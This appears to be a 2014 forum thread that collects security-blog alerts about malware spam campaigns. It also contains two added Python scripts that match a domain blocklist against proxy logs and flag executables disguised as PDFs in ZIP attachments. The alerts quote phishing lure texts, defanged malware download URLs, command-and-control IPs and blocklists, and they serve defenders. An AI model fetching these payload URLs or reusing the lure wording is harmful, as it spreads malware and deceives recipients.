You may rearrange delivery by visiting the link on the attached document or pick up the item at the DHL depot/office indicated on the receipt attached.
If the package is not rescheduled for delivery or picked up within 48 hours, it will be returned to the sender.
Airway Bill No: 7808130095
Class: Package Services
Service(s): Delivery Confirmation
Status: eNotification sent
Print this label to get this package at our depot/office.
Thank you
© 2014 Copyright© 2013 DHL. All Rights Reserved...

The attached ZIP file has the name DHL EXPRESS DELIVERY ATTEMPT.zip and contains the 293 kB large file DHL EXPRESS DELIVERY ATTEMPT.exe. The trojan is known as Trojan/Win32.Necurs, a variant of Win32/Injector.BLYN, W32/Injector.GLA!tr, Backdoor.Bot or Win32.Trojan.Bp-generic.Ixrn. At the time of writing, 6 of the 55 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/57d37614dd81d48c25bec02f4481e1757cd7a5b84ccc31904635a51d70db1a44/analysis/1410870424/

:fear::fear: :mad:
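
The blocklists in the posts above are written in a defanged "name .tld" style. The following Python script is an added example (not code from the blogs quoted above or from this thread's author) that refangs such entries and matches them against a few constructed, squid-style proxy log lines; the log format, the client addresses and the `example.org` / `example.net` lines are assumptions made for the demonstration. Parent-domain matching is deliberate so that `www.yerelyonetisim.org.tr` matches the listed `yerelyonetisim.org.tr`, while a lookalike such as `golklopro.com.example.net` does not.

```python
import re
from urllib.parse import urlsplit

# Constructed blocklist, copied from the defanged entries in the posts above.
DEFANGED_BLOCKLIST = [
    "188.165.204.210",
    "brisamarcalcados .com.br",
    "triera .biz.ua",
    "yerelyonetisim .org.tr",
    "ngujungwap .mobi.ps",
    "golklopro .com",
]

def refang(indicator: str) -> str:
    """Turn 'triera .biz.ua' or 'http ://host .tld/x' back into a usable indicator."""
    s = indicator.strip()
    s = re.sub(r"\s+://", "://", s)   # 'http ://' -> 'http://'
    s = re.sub(r"\s+\.", ".", s)      # 'triera .biz' -> 'triera.biz'
    s = s.replace("[.]", ".").replace("hxxp", "http")
    return s

def build_blocklist(entries):
    """Set of refanged, lower-cased hosts/IPs for O(1) lookups."""
    return {refang(e).lower() for e in entries}

# Constructed proxy log lines ("ts client method url status"); not from the page.
# URL paths are the ones quoted in the posts; clients and the example.* lines are made up.
SAMPLE_PROXY_LOG = """\
1410862700 10.0.0.12 GET http://www.yerelyonetisim.org.tr/pdf/Message_2864_pdf.zip 200
1410862712 10.0.0.12 GET http://triera.biz.ua/twndcrfbru/zjliqkgppi.js 200
1410862730 10.0.0.12 POST http://188.165.204.210/1709uk1/NODE01/0/51-SP3/0/ 200
1410862745 10.0.0.33 GET http://www.example.org/index.html 200
1410862760 10.0.0.33 GET http://golklopro.com.example.net/ 200
"""

def host_matches(host, blocklist):
    """Exact or parent-domain match (www.x.tld matches x.tld); never a bare suffix match."""
    host = host.lower()
    if host in blocklist:
        return host
    labels = host.split(".")
    for i in range(1, len(labels)):
        parent = ".".join(labels[i:])
        if parent in blocklist:
            return parent
    return None

def scan_proxy_log(log_text, blocklist):
    """Return (client, requested_host, matched_indicator) for every blocklisted request."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # malformed line; skip rather than crash the sweep
        _ts, client, _method, url = parts[:4]
        host = urlsplit(url).hostname
        if not host:
            continue
        matched = host_matches(host, blocklist)
        if matched:
            hits.append((client, host, matched))
    return hits

if __name__ == "__main__":
    for client, host, ioc in scan_proxy_log(SAMPLE_PROXY_LOG, build_blocklist(DEFANGED_BLOCKLIST)):
        print(f"{client} -> {host} (blocklist entry: {ioc})")
```

The same `host_matches` logic applies to DNS query logs; only the field layout in `scan_proxy_log` would change.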

AplusWebMaster
2014-09-17, 13:20
FYI...

Fake FAX SPAM - malware
- http://blog.dynamoo.com/2014/09/youve-received-new-fax-no-you-havent.html
17 Sep 2014 - "This tired old spam format comes with warmed-over malware attachment.
From: Fax [fax@ victimdomain .com]
Date: 17 September 2014 09:32
Subject: You've received a new fax
New fax at SCAN6405035 from EPSON by https ://victimdomain .com
Scan date: Wed, 17 Sep 2014 16:32:29 +0800
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...
(Google Disk Drive is a file hosting service operated by Google, Inc.)

The link in the email downloads an archive file Message_Document_pdf.zip from the same estudiocarraro .com .br site. This has a VirusTotal detection rate of 3/54*. The ThreatTrack report shows that the malware attempts to phone home to:
denis-benker .de/teilen/1709uk1.hit
188.165.204.210/1709uk1/NODE01/0/51-SP3/0/
188.165.204.210/1709uk1/NODE01/1/0/0/
188.165.204.210/1709uk1/NODE01/41/5/4/
Recommended blocklist:
188.165.204.210
denis-benker .de
estudiocarraro .com.br"
* https://www.virustotal.com/en-gb/file/01e69a84cd47f38786affe7348fb334f2092984fa11444352ee5a0431c505f6d/analysis/1410943351/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en-gb/ip-address/137.170.185.211/information/

188.165.204.210: https://www.virustotal.com/en-gb/ip-address/188.165.204.210/information/
___

Fake ADP Invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/adp-invoice-pdf-malware/
17 Sep 2014 - "'ADP Invoice' pretending to come from billing.address.updates@ adp .com is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... we always say don’t open any attachment or file sent to you in an email, but with fake or malicious PDF files that is quite difficult.

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/adp-invoice-with-malicious-pdf.png

17 September 2014: adp_invoice_46887645.pdf
Current Virus total detections: 8/55*. This ADP Invoice is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2653224f479aa10f4e82b489987bb519f563786b676bacb76a5efba2963cd546/analysis/1410974477/
___

Android Malware uses SSL for Evasion
- http://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-use-ssl-for-evasion/
Sep 17, 2014 - "... a double-edged sword. Android malware is now utilizing SSL to hide their routines and to evade detection. SSL servers have become a target of Android malware. Malware can use any of the three types of servers... This malware steals user and device information, such as the IMEI, phone number, and images stored in the SD card. Whenever the user starts the app or once the phone reboots, the app will start a backend service to dump the aforementioned information and use a hard-coded Gmail account and password to send the information to a particular email address... ANDROIDOS_TRAMP.HAT attempts to disguise itself as an official Google service. It collects user information like the phone number, location, and contact list. Upon execution, it registers GCMBroadCastReceiver. The malicious app will then post the -stolen- data via Google Cloud Messaging. Google Cloud Messaging is used for C&C communication of the malicious app. Commands such as “send message,” “block call,” and “get current location” are sent and received via Google Cloud Messaging... ANDROIDOS_BACKDOORSNSTWT.A triggers its C&C attack through Twitter. The malware crawls for Twitter URLs and combines the obtained information with a hard-coded string to generate a new C&C URL for attacks. The stolen information is sent to the generated URL... Cybercriminals may have also targeted SSL servers and services because they do not need to exert much effort into gaining access to these sites. They can do so via normal and legal means, such as buying a virtual host from web-hosting services or registering a new account on Twitter. Should we see more use (and abuse) of SSL, detecting malicious apps may not be enough. Collaboration with server providers and services will be needed in removing related URLs, email addresses, and the like. Given the constant evolution of Android malware, we advise users to download Android apps only from legitimate sources.
Third-party app stores may not be as strict when it comes to scanning for potentially malicious apps. We also advise users to use a security solution that can detect and block threats that may cause harm to mobile devices..."
(More detail at the trendmicro URL above.)
___

Fake UKFast invoice SPAM – malware attachment
- http://myonlinesecurity.co.uk/ukfast-invoice-fake-pdf-malware/
17 Sep 2014 - "'UKFast invoice' pretending to come from UKFast Accounts <accounts@ ukfast .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The subject line and the to: lines on these emails are blank...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/ukfast-invoice.png

17 September 2014: Invoice-17009106-001.zip ( 137 kb): Extracts to: Invoice 17009106-001.exe
Current Virus total detections: 0/55*. This UKFast invoice is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/200ef318f11db4e3975159b378a48bf2d6420c3a48d7f4c75efe1cb2acbc22b8/analysis/1410939664/
___

Fake Invoice SPAM ...
- http://myonlinesecurity.co.uk/strabane-weekly-news-inv0071981-newspaper-copy-fake-pdf-malware/
17 Sep 2014 - "'Strabane Weekly News INV0071981 – Newspaper copy' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... -same- malware as one version of today’s UKFast invoice – fake PDF malware*... The email looks like:
Dear Sir,
Please find attached the copy of the advert for INV0071981 in the Strabane Weekly News.
Thank you,
Darragh

This 'Strabane Weekly News INV0071981 – Newspaper copy' is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/ukfast-invoice-fake-pdf-malware/

:fear: :mad:
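
Several posts above describe the same trick: a ZIP attachment whose member is an .exe or .scr carrying a PDF icon and a document-like name (`..._pdf.exe`), so that with "hide extensions for known file types" on it looks like a PDF. The Python script below is an added example written for this thread, not code from the quoted blogs, showing the mail-gateway side check a defender can run on such an attachment: it flags executable extensions, a document hint placed just before the real extension, and a PE (`MZ`) header under a non-executable extension. The sample archive is constructed in memory; its member names follow the filenames quoted in the posts, and the `MZ` stubs are placeholders, not real samples.

```python
import io
import zipfile
from dataclasses import dataclass

# Extensions Windows will execute directly; .scr is a plain PE despite the name.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".jar"}
# Document types a lure typically pretends to be ("Label_..._pdf.exe").
DOCUMENT_HINTS = ("pdf", "doc", "docx", "xls", "jpg")

@dataclass
class Finding:
    member: str
    reason: str

def _looks_like_pe(head: bytes) -> bool:
    """Windows executables (EXE/SCR/DLL) start with the 'MZ' DOS header."""
    return head[:2] == b"MZ"

def inspect_attachment(zip_bytes: bytes):
    """Return a Finding per suspicious trait of each member in the ZIP."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            stem, dot, ext = name.lower().rpartition(".")
            ext = "." + ext if dot else ""
            with zf.open(info) as fh:
                head = fh.read(2)  # only the magic bytes; never run the content
            if ext in EXECUTABLE_EXTS:
                findings.append(Finding(name, f"executable extension {ext}"))
                # Document name hidden in front of the real extension, e.g. ..._pdf.exe
                if any(stem.endswith(("_" + h, "." + h, "-" + h)) for h in DOCUMENT_HINTS):
                    findings.append(Finding(name, "document name masquerade before real extension"))
            elif _looks_like_pe(head):
                findings.append(Finding(name, f"PE header (MZ) under non-executable extension {ext or '(none)'}"))
    return findings

def build_sample_zip() -> bytes:
    """Constructed sample modelled on the zip->exe lures above; the 'MZ' stubs are placeholders."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Homicide-case#15808_pdf.exe", b"MZ" + b"\x00" * 62)   # name + ext both suspicious
        zf.writestr("fax-id9182719182837529.scr", b"MZ" + b"\x00" * 62)    # .scr is an executable
        zf.writestr("report.pdf", b"MZ" + b"\x00" * 62)                    # extension lies, header doesn't
        zf.writestr("real.pdf", b"%PDF-1.4\n%constructed placeholder")     # benign control
    return buf.getvalue()

if __name__ == "__main__":
    for f in inspect_attachment(build_sample_zip()):
        print(f"{f.member}: {f.reason}")
```

Checking the magic bytes as well as the name matters because the extension is exactly what the lure controls; the header check is what catches a renamed executable even when the name looks innocent.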

AplusWebMaster
2014-09-18, 14:35
FYI...

Fake NatWest SPAM - malware attached
- http://blog.dynamoo.com/2014/09/important-new-account-invoice-spam.html
18 Sep 2014 - "This -fake- NatWest invoice (since when did banks send invoices?) leads to a malicious ZIP file.
From: NatWest Invoice [invoice@ natwest .com]
Date: 18 September 2014 11:06
Subject: Important - New account invoice
Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
To view/download your invoice please click here or follow the link below ...
Thank you for choosing NatWest...

The link in this particular email goes to bnsoutlaws .co.uk/qvgstopmdi/njfeziackv.html which then downloads a ZIP file from bnsoutlaws .co.uk/qvgstopmdi/Account_Document.zip which in turn contains a malicious executable Account_Document.scr which has a VirusTotal detection rate of just 1/53*. The ThreatTrack report [pdf] shows that the malware attempts to call home...
Recommended blocklist:
188.165.204.210
liverpoolfc .bg
bnsoutlaws .co.uk "
* https://www.virustotal.com/en-gb/file/9202af35dbf5620096a42766582f231654c74677ee3dcb70a5af6d178fcc0163/analysis/1411032337/
... Behavioural information
TCP connections
91.215.216.52: https://www.virustotal.com/en-gb/ip-address/91.215.216.52/information/
188.165.204.210: https://www.virustotal.com/en-gb/ip-address/188.165.204.210/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en-gb/ip-address/137.170.185.211/information/

UPDATE: The -same- malware is also being pushed by a fake Lloyds Bank email..
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 18 September 2014 11:45
Subject: Important - Commercial Documents
Important account documents
Reference: C146
Case number: 68819453
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file) ...

- http://myonlinesecurity.co.uk/nat-west-important-new-account-invoice-fake-pdf-malware/
18 Sep 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/Nat-West-New-account-invoice.png
___

Fake eFax SPAM - PDF malware
- http://myonlinesecurity.co.uk/efax-report-fake-pdf-malware/
18 Sep 2014 - "'eFax Report' pretending to come from eFax Report <noreply@ efax-reports .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
INCOMING FAX REPORT
Date/Time: Thursday, 18.09.2014
Speed: 353bps
Connection time: 08:02
Page: 4
Resolution: Normal
Remote ID: 611-748-177946
Line number: 3
DTMF/DID:
Description: Internal only ...

18 September 2014: fax-id9182719182837529.zip ( 189 kb): Extracts to: fax-id9182719182837529.scr
Current Virus total detections: 1/54*. This eFax Report is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5a6c3fdd158c157b0c7e4293ad0a56b8ef2b2ececd68b4c075fc4b8cc16f6922/analysis/1411049220/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Line Voice Message Spam
- http://threattrack.tumblr.com/post/97827881718/line-voice-message-spam
18 Sep 2014 - "Subjects Seen:
You have a voice message
Typical e-mail details:
LINE Notification
You have a voice message, listen it now.
Time: 21:12:45 14.10.2014, Duration: 45sec

Malicious URLs:
iagentnetwork .com/sql.php?line=gA7EF9bA7ns68jJ0eBi8ww
Malicious File Name and MD5:
LINE_Call_<phone number>.zip (7FC6D33F62942B55AD94F20BDC7A3797)
LINE_Call_<phone number>.exe (C3E0F4356A77D18438A38110F8BD919E)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/ad77337f36ff7e57db548378c0b961b2/tumblr_inline_nc4325Jmds1r6pupn.png

Tagged: Line.me, Kuluoz

147.202.201.24: https://www.virustotal.com/en/ip-address/147.202.201.24/information/

:mad: :fear::fear:

AplusWebMaster
2014-09-19, 15:13
FYI...

Fake 'voice mail' SPAM ...
- http://blog.dynamoo.com/2014/09/this-fake-voice-mail-message-leads-to.html
19 Sep 2014 - "This -fake- voice mail message leads to malware:
From: Microsoft Outlook [no-reply@ victimdomain .com]
Date: 19 September 2014 11:59
Subject: You have received a voice mail
You received a voice mail : VOICE976-588-6749.wav (25 KB)
Caller-Id: 976-588-6749
Message-Id: D566Y5
Email-Id: <REDACTED>
Download and extract to listen the message.
We have uploaded voicemail report on dropbox, please use the following link to download your file...
Sent by Microsoft Exchange Server

The link in the email messages goes to www .prolococapena .com/yckzpntfyl/mahlqhltkh.html first and then downloads a file from www .prolococapena .com/yckzpntfyl/Invoice102740_448129486142_pdf.zip which contains exactly the -same- malicious executable being pushed in this earlier spam run*."
* http://blog.dynamoo.com/2014/09/natwest-statement-spam-yet-again.html
19 Sep 2014 - "... shows network activity to hallerindia .com on 192.185.97.223. I would suggest that this is a good domain to -block- ..."
Screenshot: https://2.bp.blogspot.com/-Oo5Lnrowt70/VBwJo-dVgRI/AAAAAAAAFpY/TzfWXXSEP88/s1600/natwest.png

192.185.97.223: https://www.virustotal.com/en/ip-address/192.185.97.223/information/

- http://myonlinesecurity.co.uk/natwest-statement-fake-pdf-malware/
19 Sep 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/nat-west-statement.png
Current Virus total detections: 1/54*
* https://www.virustotal.com/en/file/a56ef62b4154849c04b28dd78ff2d4d383c98eb7e38785c10e9b58932f3dc0ca/analysis/1411120481/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake 'Police Suspect' SPAM - PDF malware
- http://myonlinesecurity.co.uk/city-london-police-homicide-suspect-fake-pdf-malware/
19 Sep 2014 - "'City of London Police Homicide Suspect' pretending to come from City of London Police is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Bulletin Headline: HOMICIDE SUSPECT
Sending Agency: London City Police
Sending Location: GB – London – London City Police
Bulletin Case#: 14-62597
Bulletin Author: BARILLAS #1169
Sending User #: 92856
APBnet Version: 684593
The bulletin is a pdf attachment to this email.
The Adobe Reader (from Adobe .com) will display and print the bulletin best.
You can Not reply to the bulletin by clicking on the Reply button in your email software.

Of course it is -fake- and -not- from any Police force or Police service in UK or worldwide.
19 September 2014: Homicide-case#15808_pdf.zip : Extracts to: Homicide-case#15808_pdf.exe
Current Virus total detections: 4/55*. This 'City of London Police Homicide Suspect' is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ae7f419e0093fd2d4892ea6920aaa2c12c95cede9c97cb0a1f096496d4ff93ea/analysis/1411120670/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustotal.com/en/ip-address/188.165.204.210/information/
192.185.97.223: https://www.virustotal.com/en/ip-address/192.185.97.223/information/
___

Fake 'Courier Svc' SPAM - PDF malware
- http://myonlinesecurity.co.uk/tnt-courier-service-tnt-uk-limited-package-tracking-fake-pdf-malware/
19 Sep 2014 - "'TNT UK Limited Package tracking' pretending to come from TNT COURIER SERVICE <tracking@tnt.co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
TNT COURIER SERVICE (TCS)
Customer/Delivery Services Department
Central Pk Est/Mosley Rd, Trafford Park
Manchester, M17 1TT UK.
DETAILS OF PACKAGE
Reg order no: 460911612900
Your package have been picked up and is ready for dispatch.
Connote # : 460911612900
Service Type : Export Non Documents – Intl
Shipped on : 18 Sep 14 12:00
Order No : 4240629
Status : Driver’s Return
Description : Wrong Address
Service Options: You are required to select a service option below.
The options, together with their associated conditions.
Please check attachment to view information about the sender and package.

19 September 2014: Label_GB1909201488725UK_pdf.zip: Extracts to: Label_GB1909201488725UK_pdf.exe
Current Virus total detections: 5/55*. This 'TNT UK Limited Package tracking' is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ae7f419e0093fd2d4892ea6920aaa2c12c95cede9c97cb0a1f096496d4ff93ea/analysis/1411121703/
... Behavioural information
DNS requests
hallerindia .com (192.185.97.223)
TCP connections
188.165.204.210: https://www.virustotal.com/en/ip-address/188.165.204.210/information/
192.185.97.223: https://www.virustotal.com/en/ip-address/192.185.97.223/information/
___

Bitcoin Ponzi scheme ...
- http://www.reuters.com/article/2014/09/19/us-sec-bitcoin-fraud-idUSKBN0HE1Z820140919
Sep 19, 2014 - "A U.S. federal judge in Texas ordered Bitcoin Savings and Trust and its owner to pay a combined $40.7 million after the Securities and Exchange Commission established that the company, which sold investments using the virtual currency, was a Ponzi scheme. In a decision dated Thursday, U.S. Magistrate Judge Amos Mazzant said Trendon Shavers "knowingly and intentionally" operated his company "as a sham and a Ponzi scheme," misleading investors about the use of their bitcoin, how he would generate promised returns and the safety of their investments... The SEC said Shavers used the online moniker "pirateat40" to raise more than 732,000 bitcoin from February 2011 to August 2012, promising investors up to 7 percent in weekly interest to be paid based on his ability to trade the currency. But according to the decision, Shavers used new bitcoin to repay earlier investors, diverted some to personal accounts at the now-bankrupt Mt. Gox exchange and elsewhere, and spent some investor funds on rent, food, shopping and casino visits..."
___

Apple Phish ...
- https://isc.sans.edu/diary.html?storyid=18669
2014-09-18 23:58:53 UTC - "... this in this morning:
Dear Client,
We inform you that your account is about to expire in less 48 hours, it's imperative to update your information with our audit forms, otherwise your session and/or account will be a limited access.
just click the link below and follow the steps our request form
Update now...
This is an automatically generated message. Thank you not to answer. If you need help, please visit the Apple Support.
Apple Client Support.

A variation on the -many- phishing emails we see regularly, just taking advantage of two public events, the celebrity photos and the release of the new phone. Maybe a reminder to staff as well as friends and family to -ignore- emails that say "click here" ..."
___

Hack the ad network like a boss...
- https://www.virusbtn.com/blog/2014/08_15.xml
4 Sep 2014 - "... Exploit kits have been the scourge of the web for many years. Typically starting with a single line of inserted code, they probe for a number of vulnerabilities in the browser or its plug-ins and use this to drop malware onto the victim's machine. Given the high proportion of Internet users that haven't fully patched their systems, it is a successful way to spread malware.
> https://www.virusbtn.com/images/news/general_malicious_ads.png
... in order for exploit kits to do their work, a vulnerable website must first be infected, or the user must be enticed into clicking a malicious link. But by purchasing ad space, and using this to place malicious ads, attackers have discovered a cheap and effective way to get their malicious code to run inside the browser of many users. They can even tailor their advertisements to target specific languages, regions or even website subjects... We learned last month that this is a serious problem - when researchers found that cybercriminals had purchased advertising space on Yahoo in order to serve the 'Cryptowall' ransomware.
> https://www.virusbtn.com/images/news/youtube_malicious_ads.png
Ideally... advertising networks would block malicious ads as they are added to their systems... this is easier said than done: given the size of such networks, it would take a lot of time and resources - plus, technically, it's difficult to block most malicious ads without a certain percentage of false positives..."

:fear::fear: :mad:

AplusWebMaster
2014-09-22, 15:04
FYI...

Fake gov't SPAM
- http://blog.dynamoo.com/2014/09/your-online-gatewaygovuk-submission-spam.html
22 Sep 2014 - "This -fake- spam from the UK Government Gateway leads to malware:

Screenshot: https://4.bp.blogspot.com/-O44byyBpvKE/VCACHn_z67I/AAAAAAAAFro/5VfC-5YRsOw/s1600/gateway.png

The link in the email does -not- go to gateway .gov.uk at all, but in this case the link goes to the following:
http ://maedarchitettura .it/wfntvkppqi/wnazvamlzv.html ->
http ://www .maedarchitettura .it/wfntvkppqi/wnazvamlzv.html ->
http ://maedarchitettura .it/wfntvkppqi/GatewaySubmission.zip
The ZIP file contains a malicious executable GatewaySubmission.exe which has a VirusTotal detection rate of 1/55*. The Anubis report** shows that it attempts to make a connection to ruralcostarica .com which is probably worth blocking."
* https://www.virustotal.com/en-gb/file/146272b3c4119591adb7fd3f032a6f810a4bd8bd62109792eece587a0ac5c41d/analysis/1411383282/

184.168.152.32: https://www.virustotal.com/en-gb/ip-address/184.168.152.32/information/

** https://anubis.iseclab.org/?action=result&task_id=19b13cf14c76380345d98780f5ac50f82&format=html

- http://myonlinesecurity.co.uk/online-gateway-gov-uk-submission-fake-pdf-malware/
22 Sep 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/Your-online-Gateway.gov_.uk-Submission.png
...
> https://www.virustotal.com/en-gb/file/146272b3c4119591adb7fd3f032a6f810a4bd8bd62109792eece587a0ac5c41d/analysis/1411381013/
___

Fake 'LogMeIn' SPAM – malware
- http://myonlinesecurity.co.uk/september-22-2014-logmein-security-update-malware/
22 Sep 2014 - "'September 22, 2014 LogMeIn Security Update' pretending to come from LogMeIn .com <auto-mailer@ logmein .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Dear client,
We are pleased to announce that LogMeIn has released a new security certificate.
It contains new features:
• The certificate will be attached to the computer of the account holder, which will prevent any fraud activity
• Any irregular activity on your account will be detected by our security department
• This SSL security certificate patches the “Heartbleed” bug discovered earlier this year
Download the attached certificate. Update will be automatically installed by double click.
As always, your Logmein Support Team is happy to assist with any questions you may have.
Feel free to contact us ...

22 September 2014: cert_client.zip (66 kb): Extracts to: cert.scr
Current Virus total detections: 2/54*. This is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a large blue i instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a3cf855b9bfbb17e4e293c6d28290de4329338a988b5c6a33e35e7bc6f3b0c3b/analysis/1411400614/
... Behavioural information
DNS requests
icanhazip .com (23.253.218.205)
www .download .windowsupdate .com (95.101.0.104): https://www.virustotal.com/en/ip-address/95.101.0.104/information/
t54cjs4qc2r4bn63 .tor2web .org (65.112.221.20): https://www.virustotal.com/en/ip-address/65.112.221.20/information/
TCP connections
23.253.218.205: https://www.virustotal.com/en/ip-address/23.253.218.205/information/
95.101.0.83: https://www.virustotal.com/en/ip-address/95.101.0.83/information/
38.229.70.4: https://www.virustotal.com/en/ip-address/38.229.70.4/information/

- https://isc.sans.edu/diary.html?storyid=18695
2014-09-22
Screenshot: https://isc.sans.edu/diaryimages/images/Screen%20Shot%202014-09-22%20at%2011_34_06%20AM.png
...
> https://www.virustotal.com/en/file/a3cf855b9bfbb17e4e293c6d28290de4329338a988b5c6a33e35e7bc6f3b0c3b/analysis/
File name: cert.scr.exe
Detection ratio: 3/51
... Behavioural information
DNS requests
icanhazip .com (23.253.218.205): https://www.virustotal.com/en/ip-address/23.253.218.205/information/
www .download.windowsupdate .com (95.101.0.104): https://www.virustotal.com/en/ip-address/95.101.0.104/information/
t54cjs4qc2r4bn63 .tor2web .org (65.112.221.20): https://www.virustotal.com/en/ip-address/65.112.221.20/information/
TCP connections
23.253.218.205: https://www.virustotal.com/en/ip-address/23.253.218.205/information/
95.101.0.83: https://www.virustotal.com/en/ip-address/95.101.0.83/information/
38.229.70.4: https://www.virustotal.com/en/ip-address/38.229.70.4/information/
___

Fake USAA SPAM - PDF malware
- http://myonlinesecurity.co.uk/usaa-policy-renewal-please-print-auto-id-cards-pdf-malware/
22 Sep 2014 - "'USAA Policy Renewal – Please Print Auto ID Cards' pretending to come from USAA <USAA.Web.Services@customermail.usaa.com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/USAA-Policy-Renewal-Please-Print-Auto-ID-Cards.png

22 September 2014: id_card.pdf - Current Virus total detections: 11/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/644635d9cebfd696dd0e71eefce400ac744713b846ef3fb2df8268a1b48cd4cc/analysis/1411415107/

- http://threattrack.tumblr.com/post/98225075443/usaa-insurance-card-spam
23 Sep 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/37ba5ffb65ea0fbf4857f1d0fee84e0b/tumblr_inline_nccw5e1ERc1r6pupn.png
Tagged: USAA, CVE-2013-2729, Upatre, PDFExploit
___

Fake 'RBC Invoice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/rbc-invoices-pdf-malware/
22 Sep 2014 - "'RBC Invoices' pretending to come from RBC Express <ISVAdmin@ rbc .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please review the attached invoices and pay them at your earliest convenience. Feel free to contact us if you have any questions.
Thank you.

22 September 2014: invoice058342.pdf. Current Virus total detections: 10/54*. Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/644635d9cebfd696dd0e71eefce400ac744713b846ef3fb2df8268a1b48cd4cc/analysis/1411409482/
___

Fake 'Payment Advice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/hsbc-payment-advice-issued-fake-pdf-malware/
22 Sep 2014 - "'HSBC Payment Advice Issued' pretending to come from HSBC Bank UK <payment.advice@ hsbc .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment or follow the link in the email... The email looks like:
Your payment advice is issued at the request of our customer. The advice is for your reference only.
Please download your payment advice at ...
Yours faithfully,
Global Payments and Cash Management
This is an auto-generated email, please DO NOT REPLY. Any replies to this email will be disregarded.

... this drops a slightly different malware paymentadvice .exe with current VT detections of 0/53*. This HSBC Payment Advice Issued is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/844c016c9df09432f82f2a353151ca110c2474c7cb5f09c54ebc64952dd1174d/analysis/1411386112/
... Behavioural information
